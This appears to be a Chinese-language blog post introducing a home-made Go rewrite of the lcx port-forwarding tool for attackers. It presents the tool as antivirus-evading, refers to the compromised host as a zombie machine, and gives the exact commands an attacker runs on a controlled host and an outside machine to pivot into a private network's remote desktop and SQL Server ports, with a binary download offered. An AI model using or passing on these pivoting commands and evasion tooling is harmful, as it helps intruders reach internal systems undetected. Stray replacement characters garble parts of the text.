背景介紹
經常有朋友使用lcx,但是由于很多原因可能lcx都不好使�,例如下面幾點:
1���、linux下不支持lcx����,這時只能拿msf出來��;
2����、不免殺���;
3����、每次內網要重新連接其他主機的時候�,都必須重新進去并重新敲打命令 ,并且操作過多時容易被發現��。
最近正好上面那些問題都碰上了����,于是沒辦法就使用golang自己寫了一個。我寫的這個lcx有以下幾個特點:
1��、golang程序跨平臺性���,甚至嵌入式Linux都支持�;
2、免殺,基本上目前golang程序都不會被識別為病毒;
3����、肉雞只需操作一次��,其他的都交給主控端操作。
該工具運行界面如下所示:
使用方法
為了講解該工具的功能和使用方法����,以下列場景展開介紹:
前提介紹:
網絡拓撲如上圖所示����,內網私有����,外網無法直接訪問內網任意主機,但其中A已經控制了B����。
實現目標:
攻擊者A通過B 連接內網中任意一臺計算機(如遠程桌面,數據庫等)。
場景一:A連接內網中C的遠程桌面
第一步: 在B上面輸入指令:
lcx 111.13.100.92 123
第二步:假如 A 想連接內網中 C 的遠程桌面�����,那么在A上輸入指令:
lcx 456 123 192.168.10.3 3389
這時�����, A 只用連接本機的456端口就等于連接內網C的3389端口了�。
場景二:A連接內網中其他機器的MS SQL數據庫(假設IP地址為192.168.10.55)
第一步,在B上輸入指令:
lcx 111.13.100.92 123
第二步,在A上輸入指令:
lcx 1433 123 192.168.10.55 1433
這時��,A只用連接本機1433端口就等于連接內網中(192.168.10.55)的1433端口了�����。
工具下載
暫時只提供windows版本:lcx._g
本文作者:PulseO0O
附件:lcx._g.rar
該文章在 2021/2/3 17:29:24 編輯過
400 186 1886
